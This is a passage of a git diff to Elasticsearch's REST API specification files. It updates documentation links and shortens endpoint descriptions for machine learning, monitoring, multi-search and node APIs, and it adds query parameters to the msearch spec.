+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-open-job", + "description":"Open anomaly detection jobs" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.post_calendar_events.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.post_calendar_events.json index a23472b752a38..1b01dd16f7f5d 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.post_calendar_events.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.post_calendar_events.json @@ -1,8 +1,8 @@ { "ml.post_calendar_events":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-post-calendar-event.html", - "description":"Posts scheduled events in a calendar." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-post-calendar-events", + "description":"Add scheduled events to the calendar" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.post_data.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.post_data.json index cd2deb1024c1e..f2567ea1ad69a 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.post_data.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.post_data.json @@ -1,8 +1,8 @@ { "ml.post_data":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-post-data.html", - "description":"Sends data to an anomaly detection job for analysis." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-post-data", + "description":"Send data to an anomaly detection job for analysis" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.preview_data_frame_analytics.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.preview_data_frame_analytics.json index 363318c319b54..242b7b4241635 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.preview_data_frame_analytics.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.preview_data_frame_analytics.json @@ -1,8 +1,8 @@ { "ml.preview_data_frame_analytics":{ "documentation":{ - "url":"http://www.elastic.co/guide/en/elasticsearch/reference/current/preview-dfanalytics.html", - "description":"Previews that will be analyzed given a data frame analytics config." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-preview-data-frame-analytics", + "description":"Preview features used by data frame analytics" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.preview_datafeed.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.preview_datafeed.json index 7af47194aa4a7..0a3b618bf7065 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.preview_datafeed.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.preview_datafeed.json @@ -1,8 +1,8 @@ { "ml.preview_datafeed":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-preview-datafeed.html", - "description":"Previews a datafeed." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-preview-datafeed", + "description":"Preview a datafeed" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_calendar.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_calendar.json index 597b5d958193d..91b6cf27d2638 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_calendar.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_calendar.json @@ -1,8 +1,8 @@ { "ml.put_calendar":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-put-calendar.html", - "description":"Instantiates a calendar." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-put-calendar", + "description":"Create a calendar" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_calendar_job.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_calendar_job.json index e7e0476a790da..d197a80ba1357 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_calendar_job.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_calendar_job.json @@ -1,8 +1,8 @@ { "ml.put_calendar_job":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-put-calendar-job.html", - "description":"Adds an anomaly detection job to a calendar." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-put-calendar-job", + "description":"Add anomaly detection job to calendar" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_data_frame_analytics.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_data_frame_analytics.json index 747f018428aa4..688a958c5a254 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_data_frame_analytics.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_data_frame_analytics.json @@ -1,8 +1,8 @@ { "ml.put_data_frame_analytics":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/put-dfanalytics.html", - "description":"Instantiates a data frame analytics job." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-put-data-frame-analytics", + "description":"Create a data frame analytics job" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_datafeed.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_datafeed.json index 147290cfaf520..af2abad602e6f 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_datafeed.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_datafeed.json @@ -1,8 +1,8 @@ { "ml.put_datafeed":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-put-datafeed.html", - "description":"Instantiates a datafeed." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-put-datafeed", + "description":"Create a datafeed" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_filter.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_filter.json index 0e7de69a9fed1..4e89bc8a62f77 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_filter.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_filter.json @@ -1,8 +1,8 @@ { "ml.put_filter":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-put-filter.html", - "description":"Instantiates a filter." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-put-filter", + "description":"Create a filter" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_job.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_job.json index 52cb95fc56b5b..dc955cc48141c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_job.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_job.json @@ -1,8 +1,8 @@ { "ml.put_job":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-put-job.html", - "description":"Instantiates an anomaly detection job." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-put-job", + "description":"Create an anomaly detection job" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_trained_model.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_trained_model.json index 33e6aee74e8fa..c633693599a33 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_trained_model.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_trained_model.json @@ -1,8 +1,8 @@ { "ml.put_trained_model":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/put-trained-models.html", - "description":"Creates an inference trained model." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-put-trained-model", + "description":"Create a trained model" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_trained_model_alias.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_trained_model_alias.json index 3f953d1b9d693..27719f0bea339 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_trained_model_alias.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_trained_model_alias.json @@ -1,8 +1,8 @@ { "ml.put_trained_model_alias":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/put-trained-models-aliases.html", - "description":"Creates a new model alias (or reassigns an existing one) to refer to the trained model" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-put-trained-model-alias", + "description":"Create or update a trained model alias" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_trained_model_definition_part.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_trained_model_definition_part.json index bf826f36e93c6..fb484915c92f8 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_trained_model_definition_part.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_trained_model_definition_part.json @@ -1,8 +1,8 @@ { "ml.put_trained_model_definition_part":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/put-trained-model-definition-part.html", - "description":"Creates part of a trained model definition" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-put-trained-model-definition-part", + "description":"Create part of a trained model definition" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_trained_model_vocabulary.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_trained_model_vocabulary.json index f6fd70a75c000..b35c95b36f39a 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_trained_model_vocabulary.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_trained_model_vocabulary.json @@ -1,8 +1,8 @@ { "ml.put_trained_model_vocabulary":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/put-trained-model-vocabulary.html", - "description":"Creates a trained model vocabulary" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-put-trained-model-vocabulary", + "description":"Create a trained model vocabulary" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.reset_job.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.reset_job.json index bcfb48871371b..ef32819cb5386 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.reset_job.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.reset_job.json @@ -1,8 +1,8 @@ { "ml.reset_job":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-reset-job.html", - "description":"Resets an existing anomaly detection job." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-reset-job", + "description":"Reset an anomaly detection job" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.revert_model_snapshot.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.revert_model_snapshot.json index 02ae0edd610e6..8859e57ee1e39 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.revert_model_snapshot.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.revert_model_snapshot.json @@ -1,8 +1,8 @@ { "ml.revert_model_snapshot":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-revert-snapshot.html", - "description":"Reverts to a specific snapshot." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-revert-model-snapshot", + "description":"Revert to a snapshot" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.set_upgrade_mode.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.set_upgrade_mode.json index 0ef2ad9a4b650..912c6f04c1e3e 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.set_upgrade_mode.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.set_upgrade_mode.json @@ -1,8 +1,8 @@ { "ml.set_upgrade_mode":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-set-upgrade-mode.html", - "description":"Sets a cluster wide upgrade_mode setting that prepares machine learning indices for an upgrade." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-set-upgrade-mode", + "description":"Set upgrade_mode for ML indices" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.start_data_frame_analytics.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.start_data_frame_analytics.json index 039bc24a141ed..078d65cd60d3c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.start_data_frame_analytics.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.start_data_frame_analytics.json @@ -1,8 +1,8 @@ { "ml.start_data_frame_analytics":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/start-dfanalytics.html", - "description":"Starts a data frame analytics job." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-start-data-frame-analytics", + "description":"Start a data frame analytics job" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.start_datafeed.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.start_datafeed.json index 9e9231805ea91..804c4ba22990f 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.start_datafeed.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.start_datafeed.json @@ -1,8 +1,8 @@ { "ml.start_datafeed":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-start-datafeed.html", - "description":"Starts one or more datafeeds." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-start-datafeed", + "description":"Start datafeeds" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.start_trained_model_deployment.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.start_trained_model_deployment.json index 3abf072e2efe5..5fd3c0f69fe14 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.start_trained_model_deployment.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.start_trained_model_deployment.json @@ -1,8 +1,8 @@ { "ml.start_trained_model_deployment":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/start-trained-model-deployment.html", - "description":"Start a trained model deployment." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-start-trained-model-deployment", + "description":"Start a trained model deployment" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.stop_data_frame_analytics.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.stop_data_frame_analytics.json index 3fc6c3046524f..4e7e0a4f4d675 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.stop_data_frame_analytics.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.stop_data_frame_analytics.json @@ -1,8 +1,8 @@ { "ml.stop_data_frame_analytics":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/stop-dfanalytics.html", - "description":"Stops one or more data frame analytics jobs." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-stop-data-frame-analytics", + "description":"Stop data frame analytics jobs" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.stop_datafeed.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.stop_datafeed.json index 6eb64661f6f41..998b7edcb135a 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.stop_datafeed.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.stop_datafeed.json @@ -1,8 +1,8 @@ { "ml.stop_datafeed":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-stop-datafeed.html", - "description":"Stops one or more datafeeds." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-stop-datafeed", + "description":"Stop datafeeds" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.stop_trained_model_deployment.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.stop_trained_model_deployment.json index 016d88c684e43..46f64bdb446d9 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.stop_trained_model_deployment.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.stop_trained_model_deployment.json @@ -1,8 +1,8 @@ { "ml.stop_trained_model_deployment":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/stop-trained-model-deployment.html", - "description":"Stop a trained model deployment." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-stop-trained-model-deployment", + "description":"Stop a trained model deployment" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.update_data_frame_analytics.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.update_data_frame_analytics.json index a7ea3bb22e513..c35c242fe1a54 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.update_data_frame_analytics.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.update_data_frame_analytics.json @@ -1,8 +1,8 @@ { "ml.update_data_frame_analytics":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/update-dfanalytics.html", - "description":"Updates certain properties of a data frame analytics job." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-update-data-frame-analytics", + "description":"Update a data frame analytics job" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.update_datafeed.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.update_datafeed.json index 8c353a550d9c7..c618997252941 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.update_datafeed.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.update_datafeed.json @@ -1,8 +1,8 @@ { "ml.update_datafeed":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-update-datafeed.html", - "description":"Updates certain properties of a datafeed." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-update-datafeed", + "description":"Update a datafeed" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.update_filter.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.update_filter.json index f237c45c4b241..2714d76071ac6 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.update_filter.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.update_filter.json @@ -1,8 +1,8 @@ { "ml.update_filter":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-update-filter.html", - "description":"Updates the description of a filter, adds items, or removes items." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-update-filter", + "description":"Update a filter" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.update_job.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.update_job.json index 69bdcd0100d49..226f11554ef32 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.update_job.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.update_job.json @@ -1,8 +1,8 @@ { "ml.update_job":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-update-job.html", - "description":"Updates certain properties of an anomaly detection job." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-update-job", + "description":"Update an anomaly detection job" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.update_model_snapshot.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.update_model_snapshot.json index 77414590371f1..36c9be3c03c82 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.update_model_snapshot.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.update_model_snapshot.json @@ -1,8 +1,8 @@ { "ml.update_model_snapshot":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-update-snapshot.html", - "description":"Updates certain properties of a snapshot." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-update-model-snapshot", + "description":"Update a snapshot" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.update_trained_model_deployment.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.update_trained_model_deployment.json index cc505e873b442..09201207ebce2 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.update_trained_model_deployment.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.update_trained_model_deployment.json @@ -1,8 +1,8 @@ { "ml.update_trained_model_deployment":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/update-trained-model-deployment.html", - "description":"Updates certain properties of trained model deployment." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-update-trained-model-deployment", + "description":"Update a trained model deployment" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.upgrade_job_snapshot.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.upgrade_job_snapshot.json index 22de8d4915ad0..14a3fda799d79 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.upgrade_job_snapshot.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.upgrade_job_snapshot.json @@ -1,8 +1,8 @@ { "ml.upgrade_job_snapshot":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-upgrade-job-model-snapshot.html", - "description":"Upgrades a given job snapshot to the current major version." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-upgrade-job-snapshot", + "description":"Upgrade a snapshot" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.validate.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.validate.json index b57f1bb69ffa1..86520a1d15edd 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.validate.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.validate.json @@ -2,7 +2,7 @@ "ml.validate":{ "documentation":{ "url":"https://www.elastic.co/guide/en/machine-learning/current/ml-jobs.html", - "description":"Validates an anomaly detection job." 
+ "description":"Validate an anomaly detection job" }, "stability":"stable", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.validate_detector.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.validate_detector.json index 1400da1ccee09..8af3d9c0414c9 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.validate_detector.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.validate_detector.json @@ -2,7 +2,7 @@ "ml.validate_detector":{ "documentation":{ "url":"https://www.elastic.co/guide/en/machine-learning/current/ml-jobs.html", - "description":"Validates an anomaly detection detector." + "description":"Validate an anomaly detection job" }, "stability":"stable", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/monitoring.bulk.json b/rest-api-spec/src/main/resources/rest-api-spec/api/monitoring.bulk.json index 35f1a9dd13646..08019b70f9114 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/monitoring.bulk.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/monitoring.bulk.json @@ -1,8 +1,8 @@ { "monitoring.bulk":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/monitor-elasticsearch-cluster.html", - "description":"Used by the monitoring features to send monitoring data." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch", + "description":"Send monitoring data" }, "stability":"stable", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/msearch.json b/rest-api-spec/src/main/resources/rest-api-spec/api/msearch.json index 359d1e67b07e5..9f39bfb12dc5e 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/msearch.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/msearch.json @@ -1,8 +1,8 @@ { "msearch":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/search-multi-search.html", - "description":"Allows to execute several search operations in one request." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-msearch", + "description":"Run multiple searches" }, "stability":"stable", "visibility":"public", @@ -69,6 +69,38 @@ "type":"boolean", "description":"Indicates whether network round-trips should be minimized as part of cross-cluster search requests execution", "default":"true" + }, + "index":{ + "type":"list", + "description":"A comma-separated list of index names to use as default" + }, + "ignore_unavailable":{ + "type":"boolean", + "description":"Whether specified concrete indices should be ignored when unavailable (missing or closed)" + }, + "ignore_throttled":{ + "type":"boolean", + "description":"Whether specified concrete, expanded or aliased indices should be ignored when throttled", + "deprecated":true + }, + "allow_no_indices":{ + "type":"boolean", + "description":"Whether to ignore if a wildcard indices expression resolves into no concrete indices. (This includes `_all` string or when no indices have been specified)" + }, + "expand_wildcards":{ + "type":"enum", + "options": ["open", "closed", "hidden", "none", "all"], + "default":"open", + "description":"Whether to expand wildcard expression to concrete indices that are open, closed or both." 
+ }, + "routing":{ + "type":"list", + "description":"A comma-separated list of specific routing values" + }, + "include_named_queries_score":{ + "type":"boolean", + "description":"Indicates whether hit.matched_queries should be rendered as a map that includes the name of the matched query associated with its score (true) or as an array containing the name of the matched queries (false)", + "default": false } }, "body":{ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/msearch_template.json b/rest-api-spec/src/main/resources/rest-api-spec/api/msearch_template.json index 38b1d5b6add09..a8c4ebd526031 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/msearch_template.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/msearch_template.json @@ -1,8 +1,8 @@ { "msearch_template":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/search-multi-search.html", - "description":"Allows to execute several search template operations in one request." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-msearch-template", + "description":"Run multiple templated searches" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/mtermvectors.json b/rest-api-spec/src/main/resources/rest-api-spec/api/mtermvectors.json index fd7a5493363e3..55b5b6796e727 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/mtermvectors.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/mtermvectors.json @@ -1,8 +1,8 @@ { "mtermvectors":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-multi-termvectors.html", - "description":"Returns multiple termvectors in one request." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-mtermvectors", + "description":"Get multiple term vectors" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.clear_repositories_metering_archive.json b/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.clear_repositories_metering_archive.json index 3edcb98e8b2e3..767662682f6b4 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.clear_repositories_metering_archive.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.clear_repositories_metering_archive.json @@ -1,8 +1,8 @@ { "nodes.clear_repositories_metering_archive":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/clear-repositories-metering-archive-api.html", - "description":"Removes the archived repositories metering information present in the cluster." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-nodes-clear-repositories-metering-archive", + "description":"Clear the archived repositories metering" }, "stability":"experimental", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.get_repositories_metering_info.json b/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.get_repositories_metering_info.json index 312b6b6c82eea..5d9c5e9edca3c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.get_repositories_metering_info.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.get_repositories_metering_info.json @@ -1,8 +1,8 @@ { "nodes.get_repositories_metering_info":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/get-repositories-metering-api.html", - "description":"Returns cluster repositories metering information." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-nodes-get-repositories-metering-info", + "description":"Get cluster repositories metering" }, "stability":"experimental", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.hot_threads.json b/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.hot_threads.json index 8c8794e05c282..ed47c7a3b2601 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.hot_threads.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.hot_threads.json @@ -1,8 +1,8 @@ { "nodes.hot_threads":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cluster-nodes-hot-threads.html", - "description":"Returns information about hot threads on each node in the cluster." + 